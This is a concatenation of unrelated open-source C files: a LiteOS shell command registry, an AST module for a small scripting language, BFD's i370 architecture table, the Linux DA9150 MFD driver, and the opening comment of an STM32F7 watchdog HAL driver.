((*temp >= '0') && (*temp <= '9')) { if (state == STAT_NONE) { state = STAT_DIGIT; } } else { state = STAT_OTHER; } temp++; } if (state == STAT_DIGIT) { return FALSE; } return TRUE; } LITE_OS_SEC_TEXT_MINOR VOID OsCmdAscendingInsert(CmdItemNode *cmd) { CmdItemNode *cmdItem = NULL; CmdItemNode *cmdNext = NULL; if (cmd == NULL) { return; } for (cmdItem = LOS_DL_LIST_ENTRY((&cmdInfo.cmdList.list)->pstPrev, CmdItemNode, list); &cmdItem->list != &(cmdInfo.cmdList.list); ) { cmdNext = LOS_DL_LIST_ENTRY(cmdItem->list.pstPrev, CmdItemNode, list); if (&cmdNext->list != &(cmdInfo.cmdList.list)) { if ((strncmp(cmdItem->cmd->cmdKey, cmd->cmd->cmdKey, strlen(cmd->cmd->cmdKey)) >= 0) && (strncmp(cmdNext->cmd->cmdKey, cmd->cmd->cmdKey, strlen(cmd->cmd->cmdKey)) < 0)) { LOS_ListTailInsert(&(cmdItem->list), &(cmd->list)); return; } cmdItem = cmdNext; } else { if (strncmp(cmd->cmd->cmdKey, cmdItem->cmd->cmdKey, strlen(cmd->cmd->cmdKey)) > 0) { cmdItem = cmdNext; } break; } } LOS_ListTailInsert(&(cmdItem->list), &(cmd->list)); } LITE_OS_SEC_TEXT_MINOR UINT32 OsShellKeyInit(ShellCB *shellCB) { CmdKeyLink *cmdKeyLink = NULL; CmdKeyLink *cmdHistoryLink = NULL; if (shellCB == NULL) { return OS_ERROR; } cmdKeyLink = (CmdKeyLink *)LOS_MemAlloc(m_aucSysMem0, sizeof(CmdKeyLink)); if (cmdKeyLink == NULL) { PRINT_ERR("Shell CmdKeyLink memory alloc error!\n"); return OS_ERROR; } cmdHistoryLink = (CmdKeyLink *)LOS_MemAlloc(m_aucSysMem0, sizeof(CmdKeyLink)); if (cmdHistoryLink == NULL) { (VOID)LOS_MemFree(m_aucSysMem0, cmdKeyLink); PRINT_ERR("Shell CmdHistoryLink memory alloc error!\n"); return OS_ERROR; } cmdKeyLink->count = 0; LOS_ListInit(&(cmdKeyLink->list)); shellCB->cmdKeyLink = (VOID *)cmdKeyLink; cmdHistoryLink->count = 0; LOS_ListInit(&(cmdHistoryLink->list)); shellCB->cmdHistoryKeyLink = (VOID *)cmdHistoryLink; shellCB->cmdMaskKeyLink = (VOID *)cmdHistoryLink; return LOS_OK; } LITE_OS_SEC_TEXT_MINOR VOID OsShellKeyDeInit(CmdKeyLink *cmdKeyLink) { CmdKeyLink *cmdtmp = NULL; if (cmdKeyLink == NULL) { return; } while (!LOS_ListEmpty(&(cmdKeyLink->list))) { cmdtmp = LOS_DL_LIST_ENTRY(cmdKeyLink->list.pstNext, CmdKeyLink, list); LOS_ListDelete(&cmdtmp->list); (VOID)LOS_MemFree(m_aucSysMem0, cmdtmp); } cmdKeyLink->count = 0; (VOID)LOS_MemFree(m_aucSysMem0, cmdKeyLink); } LITE_OS_SEC_TEXT_MINOR UINT32 OsShellSysCmdRegister(VOID) { UINT32 i; UINT8 *cmdItemGroup = NULL; UINT32 index = sizeof(g_shellcmdAll) / sizeof(CmdItem); CmdItemNode *cmdItem = NULL; cmdItemGroup = (UINT8 *)LOS_MemAlloc(m_aucSysMem0, index * sizeof(CmdItemNode)); if (cmdItemGroup == NULL) { PRINT_ERR("[%s]System memory allocation failure!\n", __FUNCTION__); return (UINT32)OS_ERROR; } for (i = 0; i < index; ++i) { cmdItem = (CmdItemNode *)(cmdItemGroup + i * sizeof(CmdItemNode)); cmdItem->cmd = &g_shellcmdAll[i]; OsCmdAscendingInsert(cmdItem); } cmdInfo.listNum += index; return LOS_OK; } LITE_OS_SEC_TEXT_MINOR UINT32 OsCmdExec(CmdParsed *cmdParsed) { UINT32 ret; CmdCallBackFunc cmdHook = NULL; CmdItemNode *curCmdItem = NULL; UINT32 i; const CHAR *cmdKey = NULL; if (cmdParsed == NULL) { return (UINT32)OS_ERROR; } LOS_DL_LIST_FOR_EACH_ENTRY(curCmdItem, &(cmdInfo.cmdList.list), CmdItemNode, list) { cmdKey = curCmdItem->cmd->cmdKey; if ((cmdParsed->cmdType == curCmdItem->cmd->cmdType) && (strlen(cmdKey) == strlen(cmdParsed->cmdKeyword)) && (strncmp(cmdKey, (CHAR *)(cmdParsed->cmdKeyword), strlen(cmdKey)) == 0)) { cmdHook = curCmdItem->cmd->cmdHook; break; } } ret = OS_ERROR; if (cmdHook != NULL) { ret = (cmdHook)(cmdParsed->paramCnt, (const CHAR **)cmdParsed->paramArray); } for (i = 0; i < cmdParsed->paramCnt; i++) { if (cmdParsed->paramArray[i] != NULL) { (VOID)LOS_MemFree(m_aucSysMem0, cmdParsed->paramArray[i]); cmdParsed->paramArray[i] = NULL; } } return (UINT32)ret; } ShellCB *OsGetShellCb(VOID) { return g_shellCB; } CHAR *OsShellGetWorkingDirtectory(VOID) { return OsGetShellCb()->shellWorkingDirectory; } VOID OsShellCBInit(VOID) { INT32 ret; ShellCB *shellCB = NULL; shellCB = (ShellCB *)malloc(sizeof(ShellCB)); if (shellCB == NULL) { goto ERR_OUT1; } ret = memset_s(shellCB, sizeof(ShellCB), 0, sizeof(ShellCB)); if (ret != SH_OK) { goto ERR_OUT1; } ret = (INT32)OsShellKeyInit(shellCB); if (ret != SH_OK) { goto ERR_OUT1; } (VOID)strncpy_s(shellCB->shellWorkingDirectory, PATH_MAX, "/", 2); /* 2:space for "/" */ g_shellCB = shellCB; return; ERR_OUT1: (VOID)free(shellCB); return; } LITE_OS_SEC_TEXT_MINOR UINT32 OsCmdInit(VOID) { UINT32 ret; LOS_ListInit(&(cmdInfo.cmdList.list)); cmdInfo.listNum = 0; cmdInfo.initMagicFlag = SHELL_INIT_MAGIC_FLAG; ret = LOS_MuxCreate(&cmdInfo.muxLock); if (ret != LOS_OK) { PRINT_ERR("Create mutex for shell cmd info failed\n"); return OS_ERROR; } OsShellCBInit(); return LOS_OK; } STATIC UINT32 OsCmdItemCreate(CmdType cmdType, const CHAR *cmdKey, UINT32 paraNum, CmdCallBackFunc cmdProc) { CmdItem *cmdItem = NULL; CmdItemNode *cmdItemNode = NULL; cmdItem = (CmdItem *)LOS_MemAlloc(m_aucSysMem0, sizeof(CmdItem)); if (cmdItem == NULL) { return
OS_ERRNO_SHELL_CMDREG_MEMALLOC_ERROR; } (VOID)memset_s(cmdItem, sizeof(CmdItem), '\0', sizeof(CmdItem)); cmdItemNode = (CmdItemNode *)LOS_MemAlloc(m_aucSysMem0, sizeof(CmdItemNode)); if (cmdItemNode == NULL) { (VOID)LOS_MemFree(m_aucSysMem0, cmdItem); return OS_ERRNO_SHELL_CMDREG_MEMALLOC_ERROR; } (VOID)memset_s(cmdItemNode, sizeof(CmdItemNode), '\0', sizeof(CmdItemNode)); cmdItemNode->cmd = cmdItem; cmdItemNode->cmd->cmdHook = cmdProc; cmdItemNode->cmd->paraNum = paraNum; cmdItemNode->cmd->cmdType = cmdType; cmdItemNode->cmd->cmdKey = cmdKey; (VOID)LOS_MuxPend(cmdInfo.muxLock, LOS_WAIT_FOREVER); OsCmdAscendingInsert(cmdItemNode); cmdInfo.listNum++; (VOID)LOS_MuxPost(cmdInfo.muxLock); return LOS_OK; } /* open API */ LITE_OS_SEC_TEXT_MINOR UINT32 osCmdReg(CmdType cmdType, const CHAR *cmdKey, UINT32 paraNum, CmdCallBackFunc cmdProc) { CmdItemNode *cmdItemNode = NULL; (VOID)LOS_MuxPend(cmdInfo.muxLock, LOS_WAIT_FOREVER); if (cmdInfo.initMagicFlag != SHELL_INIT_MAGIC_FLAG) { (VOID)LOS_MuxPost(cmdInfo.muxLock); PRINT_ERR("[%s] shell is not yet initialized!\n", __FUNCTION__); return OS_ERRNO_SHELL_NOT_INIT; } (VOID)LOS_MuxPost(cmdInfo.muxLock); if ((cmdProc == NULL) || (cmdKey == NULL) || (cmdType >= CMD_TYPE_BUTT) || (strlen(cmdKey) >= CMD_KEY_LEN) || !strlen(cmdKey)) { return OS_ERRNO_SHELL_CMDREG_PARA_ERROR; } if (paraNum > CMD_MAX_PARAS) { if (paraNum != XARGS) { return OS_ERRNO_SHELL_CMDREG_PARA_ERROR; } } if (OsCmdKeyCheck(cmdKey) != TRUE) { return OS_ERRNO_SHELL_CMDREG_CMD_ERROR; } (VOID)LOS_MuxPend(cmdInfo.muxLock, LOS_WAIT_FOREVER); LOS_DL_LIST_FOR_EACH_ENTRY(cmdItemNode, &(cmdInfo.cmdList.list), CmdItemNode, list) { if ((cmdType == cmdItemNode->cmd->cmdType) && ((strlen(cmdKey) == strlen(cmdItemNode->cmd->cmdKey)) && (strncmp((CHAR *)(cmdItemNode->cmd->cmdKey), cmdKey, strlen(cmdKey)) == 0))) { (VOID)LOS_MuxPost(cmdInfo.muxLock); return OS_ERRNO_SHELL_CMDREG_CMD_EXIST; } } (VOID)LOS_MuxPost(cmdInfo.muxLock); return OsCmdItemCreate(cmdType, cmdKey, paraNum, cmdProc); }
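/* Usage sketch for the open API above -- an editor's illustration, not part of shcmd.c. It registers a hypothetical "ver" command; OsShellCmdVer and ExampleShellCmdReg are assumed names, and the callback signature follows the way OsCmdExec() invokes cmdHook above. */
STATIC UINT32 OsShellCmdVer(UINT32 argc, const CHAR **argv)
{
    (VOID)argc;
    (VOID)argv;
    PRINTK("example command v1.0\n");
    return 0;
}

STATIC VOID ExampleShellCmdReg(VOID)
{
    /* paraNum 0: no fixed parameters; XARGS (as in g_shellcmdAll) would allow a variable count */
    UINT32 ret = osCmdReg(CMD_TYPE_EX, "ver", 0, (CmdCallBackFunc)OsShellCmdVer);
    if (ret != LOS_OK) {
        PRINT_ERR("ver command registration failed: 0x%x\n", ret);
    }
}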
682847.c
/* ast.c */ #include <stdlib.h> #include <string.h> #include <stdio.h> #include "ast.h" struct fh_ast *fh_new_ast(struct fh_symtab *file_names) { struct fh_ast *ast = malloc(sizeof(struct fh_ast)); if (! ast) return NULL; ast->func_list = NULL; ast->file_names = file_names; fh_init_symtab(&ast->symtab); fh_init_buffer(&ast->string_pool); return ast; } void fh_free_ast(struct fh_ast *ast) { fh_free_named_func_list(ast->func_list); fh_destroy_buffer(&ast->string_pool); fh_destroy_symtab(&ast->symtab); free(ast); } const char *fh_get_ast_symbol(struct fh_ast *ast, fh_symbol_id id) { return fh_get_symbol_name(&ast->symtab, id); } const char *fh_get_ast_string(struct fh_ast *ast, fh_string_id id) { return ast->string_pool.p + id; } fh_symbol_id fh_add_ast_file_name(struct fh_ast *ast, const char *filename) { return fh_add_symbol(ast->file_names, filename); } const char *fh_get_ast_file_name(struct fh_ast *ast, fh_symbol_id file_id) { return fh_get_symbol_name(ast->file_names, file_id); } /* node creation */ struct fh_p_named_func *fh_new_named_func(struct fh_ast *ast, struct fh_src_loc loc) { UNUSED(ast); struct fh_p_named_func *func = malloc(sizeof(struct fh_p_named_func)); if (! func) return NULL; func->next = NULL; func->loc = loc; return func; } struct fh_p_expr *fh_new_expr(struct fh_ast *ast, struct fh_src_loc loc, enum fh_expr_type type, size_t extra_size) { UNUSED(ast); struct fh_p_expr *expr = malloc(sizeof(struct fh_p_expr) + extra_size); if (! expr) return NULL; expr->next = NULL; expr->type = type; expr->loc = loc; return expr; } struct fh_p_stmt *fh_new_stmt(struct fh_ast *ast, struct fh_src_loc loc, enum fh_stmt_type type, size_t extra_size) { UNUSED(ast); struct fh_p_stmt *stmt = malloc(sizeof(struct fh_p_stmt) + extra_size); if (! stmt) return NULL; stmt->next = NULL; stmt->type = type; stmt->loc = loc; return stmt; } /* node utility functions */ int fh_expr_list_size(struct fh_p_expr *list) { int n = 0; for (struct fh_p_expr *e = list; e != NULL; e = e->next) n++; return n; } int fh_stmt_list_size(struct fh_p_stmt *list) { int n = 0; for (struct fh_p_stmt *s = list; s != NULL; s = s->next) n++; return n; } /* node destruction */ void fh_free_named_func(struct fh_p_named_func *func) { fh_free_expr(func->func); free(func); } void fh_free_named_func_list(struct fh_p_named_func *list) { struct fh_p_named_func *f = list; while (f != NULL) { struct fh_p_named_func *next = f->next; fh_free_named_func(f); f = next; } } void fh_free_expr_children(struct fh_p_expr *expr) { switch (expr->type) { case EXPR_NONE: return; case EXPR_VAR: return; case EXPR_NULL: return; case EXPR_BOOL: return; case EXPR_NUMBER: return; case EXPR_STRING: return; case EXPR_UN_OP: fh_free_expr(expr->data.un_op.arg); return; case EXPR_BIN_OP: fh_free_expr(expr->data.bin_op.left); fh_free_expr(expr->data.bin_op.right); return; case EXPR_INDEX: fh_free_expr(expr->data.index.container); fh_free_expr(expr->data.index.index); return; case EXPR_FUNC_CALL: fh_free_expr(expr->data.func_call.func); fh_free_expr_list(expr->data.func_call.arg_list); return; case EXPR_ARRAY_LIT: fh_free_expr_list(expr->data.array_lit.elem_list); return; case EXPR_MAP_LIT: fh_free_expr_list(expr->data.map_lit.elem_list); return; case EXPR_FUNC: fh_free_block(expr->data.func.body); return; } fprintf(stderr, "INTERNAL ERROR: unknown expression type '%d'\n", expr->type); } void fh_free_expr(struct fh_p_expr *expr) { if (expr) { fh_free_expr_children(expr); free(expr); } } void fh_free_expr_list(struct fh_p_expr *list) { struct fh_p_expr *e = list; while (e != NULL) {
struct fh_p_expr *next = e->next; fh_free_expr(e); e = next; } } void fh_free_stmt_children(struct fh_p_stmt *stmt) { switch (stmt->type) { case STMT_NONE: return; case STMT_EMPTY: return; case STMT_BREAK: return; case STMT_CONTINUE: return; case STMT_EXPR: fh_free_expr(stmt->data.expr); return; case STMT_VAR_DECL: fh_free_expr(stmt->data.decl.val); return; case STMT_BLOCK: fh_free_block(stmt->data.block); return; case STMT_RETURN: fh_free_expr(stmt->data.ret.val); return; case STMT_IF: fh_free_expr(stmt->data.stmt_if.test); fh_free_stmt(stmt->data.stmt_if.true_stmt); fh_free_stmt(stmt->data.stmt_if.false_stmt); return; case STMT_WHILE: fh_free_expr(stmt->data.stmt_while.test); fh_free_stmt(stmt->data.stmt_while.stmt); return; } fprintf(stderr, "INTERNAL ERROR: unknown statement type '%d'\n", stmt->type); } void fh_free_stmt(struct fh_p_stmt *stmt) { if (stmt) { fh_free_stmt_children(stmt); free(stmt); } } void fh_free_stmt_list(struct fh_p_stmt *list) { struct fh_p_stmt *s = list; while (s != NULL) { struct fh_p_stmt *next = s->next; fh_free_stmt(s); s = next; } } void fh_free_block(struct fh_p_stmt_block block) { fh_free_stmt_list(block.stmt_list); } int fh_ast_visit_expr_nodes(struct fh_p_expr *expr, int (*visit)(struct fh_p_expr *expr, void *data), void *data) { int ret; if ((ret = visit(expr, data)) != 0) return ret; switch (expr->type) { case EXPR_NONE: return 0; case EXPR_VAR: return 0; case EXPR_NULL: return 0; case EXPR_BOOL: return 0; case EXPR_NUMBER: return 0; case EXPR_STRING: return 0; case EXPR_FUNC: return 0; case EXPR_UN_OP: if ((ret = fh_ast_visit_expr_nodes(expr->data.un_op.arg, visit, data)) != 0) return ret; return 0; case EXPR_BIN_OP: if ((ret = fh_ast_visit_expr_nodes(expr->data.bin_op.left, visit, data)) != 0) return ret; if ((ret = fh_ast_visit_expr_nodes(expr->data.bin_op.right, visit, data)) != 0) return ret; return 0; case EXPR_INDEX: if ((ret = fh_ast_visit_expr_nodes(expr->data.index.container, visit, data)) != 0) return ret; if ((ret = fh_ast_visit_expr_nodes(expr->data.index.index, visit, data)) != 0) return ret; return 0; case EXPR_FUNC_CALL: if ((ret = fh_ast_visit_expr_nodes(expr->data.func_call.func, visit, data)) != 0) return ret; for (struct fh_p_expr *e = expr->data.func_call.arg_list; e != NULL; e = e->next) { if ((ret = fh_ast_visit_expr_nodes(e, visit, data)) != 0) return ret; } return 0; case EXPR_ARRAY_LIT: for (struct fh_p_expr *e = expr->data.array_lit.elem_list; e != NULL; e = e->next) { if ((ret = fh_ast_visit_expr_nodes(e, visit, data)) != 0) return ret; } return 0; case EXPR_MAP_LIT: for (struct fh_p_expr *e = expr->data.map_lit.elem_list; e != NULL; e = e->next) { if ((ret = fh_ast_visit_expr_nodes(e, visit, data)) != 0) return ret; } return 0; } fprintf(stderr, "INTERNAL ERROR: unknown expression type '%d'\n", expr->type); return 0; }
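/* Usage sketch for fh_ast_visit_expr_nodes() above -- an editor's illustration, not part of ast.c. It counts the nodes of an expression tree; count_node() and count_expr_nodes() are assumed names. */
static int count_node(struct fh_p_expr *expr, void *data)
{
  UNUSED(expr);
  (*(int *) data)++;
  return 0;     /* returning non-zero stops the walk and is passed through */
}

static int count_expr_nodes(struct fh_p_expr *expr)
{
  int n = 0;
  fh_ast_visit_expr_nodes(expr, count_node, &n);
  return n;
}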
383392.c
/* BFD i370 CPU definition Copyright (C) 1994-2014 Free Software Foundation, Inc. Contributed by Ian Lance Taylor, Cygnus Support. Hacked by Linas Vepstas <linas@linas.org> in 1998, 1999 This file is part of BFD, the Binary File Descriptor library. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street - Fifth Floor, Boston, MA 02110-1301, USA. */ #include "sysdep.h" #include "bfd.h" #include "libbfd.h" static const bfd_arch_info_type arch_info_struct[] = { /* Hack alert: old old machines are really 16 and 24 bit arch ... */ { 32, /* 32 bits in a word. */ 32, /* 32 bits in an address. */ 8, /* 8 bits in a byte. */ bfd_arch_i370, 360, /* For the 360. */ "i370", "i370:360", 3, FALSE, /* Not the default. */ bfd_default_compatible, bfd_default_scan, bfd_arch_default_fill, &arch_info_struct[1] }, { 32, /* 32 bits in a word. */ 32, /* 32 bits in an address. */ 8, /* 8 bits in a byte. */ bfd_arch_i370, 370, /* For the 370. */ "i370", "i370:370", 3, FALSE, /* Not the default. */ bfd_default_compatible, bfd_default_scan, bfd_arch_default_fill, 0 }, }; const bfd_arch_info_type bfd_i370_arch = { 32, /* 32 bits in a word. */ 32, /* 32 bits in an address. */ 8, /* 8 bits in a byte. */ bfd_arch_i370, 0, /* For the 360/370 common architecture. */ "i370", "i370:common", 3, TRUE, /* The default. */ bfd_default_compatible, bfd_default_scan, bfd_arch_default_fill, & arch_info_struct[0] };
105048.c
/* * DA9150 Core MFD Driver * * Copyright (c) 2014 Dialog Semiconductor * * Author: Adam Thomson <Adam.Thomson.Opensource@diasemi.com> * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software Foundation; either version 2 of the License, or (at your * option) any later version. */ #include <linux/kernel.h> #include <linux/module.h> #include <linux/platform_device.h> #include <linux/i2c.h> #include <linux/regmap.h> #include <linux/slab.h> #include <linux/irq.h> #include <linux/interrupt.h> #include <linux/mfd/core.h> #include <linux/mfd/da9150/core.h> #include <linux/mfd/da9150/registers.h> static bool da9150_volatile_reg(struct device *dev, unsigned int reg) { switch (reg) { case DA9150_PAGE_CON: case DA9150_STATUS_A: case DA9150_STATUS_B: case DA9150_STATUS_C: case DA9150_STATUS_D: case DA9150_STATUS_E: case DA9150_STATUS_F: case DA9150_STATUS_G: case DA9150_STATUS_H: case DA9150_STATUS_I: case DA9150_STATUS_J: case DA9150_STATUS_K: case DA9150_STATUS_L: case DA9150_STATUS_N: case DA9150_FAULT_LOG_A: case DA9150_FAULT_LOG_B: case DA9150_EVENT_E: case DA9150_EVENT_F: case DA9150_EVENT_G: case DA9150_EVENT_H: case DA9150_CONTROL_B: case DA9150_CONTROL_C: case DA9150_GPADC_MAN: case DA9150_GPADC_RES_A: case DA9150_GPADC_RES_B: case DA9150_ADETVB_CFG_C: case DA9150_ADETD_STAT: case DA9150_ADET_CMPSTAT: case DA9150_ADET_CTRL_A: case DA9150_PPR_TCTR_B: case DA9150_COREBTLD_STAT_A: case DA9150_CORE_DATA_A: case DA9150_CORE_DATA_B: case DA9150_CORE_DATA_C: case DA9150_CORE_DATA_D: case DA9150_CORE2WIRE_STAT_A: case DA9150_FW_CTRL_C: case DA9150_FG_CTRL_B: case DA9150_FW_CTRL_B: case DA9150_GPADC_CMAN: case DA9150_GPADC_CRES_A: case DA9150_GPADC_CRES_B: case DA9150_CC_ICHG_RES_A: case DA9150_CC_ICHG_RES_B: case DA9150_CC_IAVG_RES_A: case DA9150_CC_IAVG_RES_B: case DA9150_TAUX_CTRL_A: case DA9150_TAUX_VALUE_H: case DA9150_TAUX_VALUE_L: case DA9150_TBAT_RES_A: case DA9150_TBAT_RES_B: return true; default: return false; } } static const struct regmap_range_cfg da9150_range_cfg[] = { { .range_min = DA9150_PAGE_CON, .range_max = DA9150_TBAT_RES_B, .selector_reg = DA9150_PAGE_CON, .selector_mask = DA9150_I2C_PAGE_MASK, .selector_shift = DA9150_I2C_PAGE_SHIFT, .window_start = 0, .window_len = 256, }, }; static const struct regmap_config da9150_regmap_config = { .reg_bits = 8, .val_bits = 8, .ranges = da9150_range_cfg, .num_ranges = ARRAY_SIZE(da9150_range_cfg), .max_register = DA9150_TBAT_RES_B, .cache_type = REGCACHE_RBTREE, .volatile_reg = da9150_volatile_reg, }; u8 da9150_reg_read(struct da9150 *da9150, u16 reg) { int val, ret; ret = regmap_read(da9150->regmap, reg, &val); if (ret) dev_err(da9150->dev, "Failed to read from reg 0x%x: %d\n", reg, ret); return (u8) val; } EXPORT_SYMBOL_GPL(da9150_reg_read); void da9150_reg_write(struct da9150 *da9150, u16 reg, u8 val) { int ret; ret = regmap_write(da9150->regmap, reg, val); if (ret) dev_err(da9150->dev, "Failed to write to reg 0x%x: %d\n", reg, ret); } EXPORT_SYMBOL_GPL(da9150_reg_write); void da9150_set_bits(struct da9150 *da9150, u16 reg, u8 mask, u8 val) { int ret; ret = regmap_update_bits(da9150->regmap, reg, mask, val); if (ret) dev_err(da9150->dev, "Failed to set bits in reg 0x%x: %d\n", reg, ret); } EXPORT_SYMBOL_GPL(da9150_set_bits); void da9150_bulk_read(struct da9150 *da9150, u16 reg, int count, u8 *buf) { int ret; ret = regmap_bulk_read(da9150->regmap, reg, buf, count); if (ret) dev_err(da9150->dev, "Failed to bulk read from reg 0x%x: 
%d\n", reg, ret); } EXPORT_SYMBOL_GPL(da9150_bulk_read); void da9150_bulk_write(struct da9150 *da9150, u16 reg, int count, const u8 *buf) { int ret; ret = regmap_raw_write(da9150->regmap, reg, buf, count); if (ret) dev_err(da9150->dev, "Failed to bulk write to reg 0x%x %d\n", reg, ret); } EXPORT_SYMBOL_GPL(da9150_bulk_write); static struct regmap_irq da9150_irqs[] = { [DA9150_IRQ_VBUS] = { .reg_offset = 0, .mask = DA9150_E_VBUS_MASK, }, [DA9150_IRQ_CHG] = { .reg_offset = 0, .mask = DA9150_E_CHG_MASK, }, [DA9150_IRQ_TCLASS] = { .reg_offset = 0, .mask = DA9150_E_TCLASS_MASK, }, [DA9150_IRQ_TJUNC] = { .reg_offset = 0, .mask = DA9150_E_TJUNC_MASK, }, [DA9150_IRQ_VFAULT] = { .reg_offset = 0, .mask = DA9150_E_VFAULT_MASK, }, [DA9150_IRQ_CONF] = { .reg_offset = 1, .mask = DA9150_E_CONF_MASK, }, [DA9150_IRQ_DAT] = { .reg_offset = 1, .mask = DA9150_E_DAT_MASK, }, [DA9150_IRQ_DTYPE] = { .reg_offset = 1, .mask = DA9150_E_DTYPE_MASK, }, [DA9150_IRQ_ID] = { .reg_offset = 1, .mask = DA9150_E_ID_MASK, }, [DA9150_IRQ_ADP] = { .reg_offset = 1, .mask = DA9150_E_ADP_MASK, }, [DA9150_IRQ_SESS_END] = { .reg_offset = 1, .mask = DA9150_E_SESS_END_MASK, }, [DA9150_IRQ_SESS_VLD] = { .reg_offset = 1, .mask = DA9150_E_SESS_VLD_MASK, }, [DA9150_IRQ_FG] = { .reg_offset = 2, .mask = DA9150_E_FG_MASK, }, [DA9150_IRQ_GP] = { .reg_offset = 2, .mask = DA9150_E_GP_MASK, }, [DA9150_IRQ_TBAT] = { .reg_offset = 2, .mask = DA9150_E_TBAT_MASK, }, [DA9150_IRQ_GPIOA] = { .reg_offset = 2, .mask = DA9150_E_GPIOA_MASK, }, [DA9150_IRQ_GPIOB] = { .reg_offset = 2, .mask = DA9150_E_GPIOB_MASK, }, [DA9150_IRQ_GPIOC] = { .reg_offset = 2, .mask = DA9150_E_GPIOC_MASK, }, [DA9150_IRQ_GPIOD] = { .reg_offset = 2, .mask = DA9150_E_GPIOD_MASK, }, [DA9150_IRQ_GPADC] = { .reg_offset = 2, .mask = DA9150_E_GPADC_MASK, }, [DA9150_IRQ_WKUP] = { .reg_offset = 3, .mask = DA9150_E_WKUP_MASK, }, }; static struct regmap_irq_chip da9150_regmap_irq_chip = { .name = "da9150_irq", .status_base = DA9150_EVENT_E, .mask_base = DA9150_IRQ_MASK_E, .ack_base = DA9150_EVENT_E, .num_regs = DA9150_NUM_IRQ_REGS, .irqs = da9150_irqs, .num_irqs = ARRAY_SIZE(da9150_irqs), }; static struct resource da9150_gpadc_resources[] = { { .name = "GPADC", .start = DA9150_IRQ_GPADC, .end = DA9150_IRQ_GPADC, .flags = IORESOURCE_IRQ, }, }; static struct resource da9150_charger_resources[] = { { .name = "CHG_STATUS", .start = DA9150_IRQ_CHG, .end = DA9150_IRQ_CHG, .flags = IORESOURCE_IRQ, }, { .name = "CHG_TJUNC", .start = DA9150_IRQ_TJUNC, .end = DA9150_IRQ_TJUNC, .flags = IORESOURCE_IRQ, }, { .name = "CHG_VFAULT", .start = DA9150_IRQ_VFAULT, .end = DA9150_IRQ_VFAULT, .flags = IORESOURCE_IRQ, }, { .name = "CHG_VBUS", .start = DA9150_IRQ_VBUS, .end = DA9150_IRQ_VBUS, .flags = IORESOURCE_IRQ, }, }; static struct mfd_cell da9150_devs[] = { { .name = "da9150-gpadc", .of_compatible = "dlg,da9150-gpadc", .resources = da9150_gpadc_resources, .num_resources = ARRAY_SIZE(da9150_gpadc_resources), }, { .name = "da9150-charger", .of_compatible = "dlg,da9150-charger", .resources = da9150_charger_resources, .num_resources = ARRAY_SIZE(da9150_charger_resources), }, }; static int da9150_probe(struct i2c_client *client, const struct i2c_device_id *id) { struct da9150 *da9150; struct da9150_pdata *pdata = dev_get_platdata(&client->dev); int ret; da9150 = devm_kzalloc(&client->dev, sizeof(*da9150), GFP_KERNEL); if (!da9150) return -ENOMEM; da9150->dev = &client->dev; da9150->irq = client->irq; i2c_set_clientdata(client, da9150); da9150->regmap = devm_regmap_init_i2c(client, &da9150_regmap_config); if 
(IS_ERR(da9150->regmap)) { ret = PTR_ERR(da9150->regmap); dev_err(da9150->dev, "Failed to allocate register map: %d\n", ret); return ret; } da9150->irq_base = pdata ? pdata->irq_base : -1; ret = regmap_add_irq_chip(da9150->regmap, da9150->irq, IRQF_TRIGGER_LOW | IRQF_ONESHOT, da9150->irq_base, &da9150_regmap_irq_chip, &da9150->regmap_irq_data); if (ret) return ret; da9150->irq_base = regmap_irq_chip_get_base(da9150->regmap_irq_data); enable_irq_wake(da9150->irq); ret = mfd_add_devices(da9150->dev, -1, da9150_devs, ARRAY_SIZE(da9150_devs), NULL, da9150->irq_base, NULL); if (ret) { dev_err(da9150->dev, "Failed to add child devices: %d\n", ret); regmap_del_irq_chip(da9150->irq, da9150->regmap_irq_data); return ret; } return 0; } static int da9150_remove(struct i2c_client *client) { struct da9150 *da9150 = i2c_get_clientdata(client); regmap_del_irq_chip(da9150->irq, da9150->regmap_irq_data); mfd_remove_devices(da9150->dev); return 0; } static void da9150_shutdown(struct i2c_client *client) { struct da9150 *da9150 = i2c_get_clientdata(client); /* Make sure we have a wakeup source for the device */ da9150_set_bits(da9150, DA9150_CONFIG_D, DA9150_WKUP_PM_EN_MASK, DA9150_WKUP_PM_EN_MASK); /* Set device to DISABLED mode */ da9150_set_bits(da9150, DA9150_CONTROL_C, DA9150_DISABLE_MASK, DA9150_DISABLE_MASK); } static const struct i2c_device_id da9150_i2c_id[] = { { "da9150", }, { } }; MODULE_DEVICE_TABLE(i2c, da9150_i2c_id); static const struct of_device_id da9150_of_match[] = { { .compatible = "dlg,da9150", }, { } }; MODULE_DEVICE_TABLE(of, da9150_of_match); static struct i2c_driver da9150_driver = { .driver = { .name = "da9150", .of_match_table = of_match_ptr(da9150_of_match), }, .probe = da9150_probe, .remove = da9150_remove, .shutdown = da9150_shutdown, .id_table = da9150_i2c_id, }; module_i2c_driver(da9150_driver); MODULE_DESCRIPTION("MFD Core Driver for DA9150"); MODULE_AUTHOR("Adam Thomson <Adam.Thomson.Opensource@diasemi.com>"); MODULE_LICENSE("GPL");
810094.c
/** ****************************************************************************** * @file stm32f7xx_hal_wwdg.c * @author MCD Application Team * @version V1.1.1 * @date 01-July-2016 * @brief WWDG HAL module driver. * This file provides firmware functions to manage the following * functionalities of the Window Watchdog (WWDG) peripheral: * + Initialization and Configuration function * + IO operation functions @verbatim ============================================================================== ##### WWDG specific features ##### ============================================================================== [..] Once enabled the WWDG generates a system reset on expiry of a programmed time period, unless the program refreshes the counter (T[6;0] downcounter) before it reaches the value 0x3F (i.e. a reset is generated when the counter value rolls over from 0x40 to 0x3F). (+) An MCU reset is also generated if the counter value is refreshed before the counter has reached the refresh window value. This implies that the counter must be refreshed in a limited window. (+) Once enabled the WWDG cannot be disabled except by a system reset. (+) WWDGRST flag in RCC_CSR register informs when a WWDG reset has occurred (check available with __HAL_RCC_GET_FLAG(RCC_FLAG_WWDGRST)). (+) The WWDG downcounter input clock is derived from the APB clock divided by a programmable prescaler. (+) WWDG downcounter clock (Hz) = PCLK1 / (4096 * Prescaler) (+) WWDG timeout (ms) = (1000 * (T[5;0] + 1)) / (WWDG downcounter clock) where T[5;0] are the lowest 6 bits of downcounter. (+) WWDG Counter 